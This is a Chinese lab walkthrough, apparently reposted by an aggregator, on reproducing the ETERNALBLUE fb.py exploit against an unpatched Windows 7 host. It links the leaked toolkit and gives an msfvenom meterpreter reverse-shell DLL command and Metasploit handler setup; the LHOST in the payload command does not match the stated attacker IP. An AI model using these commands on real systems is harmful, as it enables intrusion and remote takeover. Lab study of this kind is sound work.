方程式ETERNALBLUE?之fb.py的复现

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了方程式ETERNALBLUE?之fb.py的复现相关的知识,希望对你有一定的参考价值。

方程式ETERNALBLUE?之fb.py的复现

1.环境简介
攻击机win2003
ip:192.168.1.105
攻击机kali:
ip:192.168.1.106
靶机(被攻击机)window7 x64(未装smb漏洞补丁)
ip:192.168.1.100

2.windows2003攻击机
攻击机win2003安装环境:
python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32-221.win-amd64-py2.6.exe:
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
方程式ETERNALBLUE 下载地址:
https://codeload.github.com/misterch0c/shadowbroker/zip/master

安装好python后,需要在win2003设置环境变量:
技术分享图片

将整个ETERNALBLUE?目录下的 windows拷贝到攻击机win2003上
技术分享图片
在windows目录下建立一个文件为:listeningposts
运行phthon fb.py
以下在攻击机win2003上执行fb.py的具体命令重要命令如下,其他命令都用回车执行。

技术分享图片

技术分享图片
技术分享图片
技术分享图片
技术分享图片

技术分享图片
3攻击机kali上
利用msf生成一个dll劫持文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 -f dll > /opt/s.dll
技术分享图片

将s.dll文件拷贝到windows2003的C盘目录下:
技术分享图片

在msf下开启msfpaylod监听:
use exploit/multi/handler
set lhost 192.168.1.106
set lport 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
技术分享图片
4.接着在windows2003下执行

技术分享图片

技术分享图片
技术分享图片
技术分享图片

技术分享图片

最后在msf下可以看到成功反弹shell:
技术分享图片

以上是关于方程式ETERNALBLUE?之fb.py的复现的主要内容,如果未能解决你的问题,请参考以下文章

永恒之蓝EternalBlue复现

方程式EQGRP_Lost_in_Translation工具之fb.py

msf上MS-2017-010(Eternalblue)的复现

Eternalblue review

永恒之蓝漏洞原理及复现

永恒之蓝漏洞复现(ms17-010)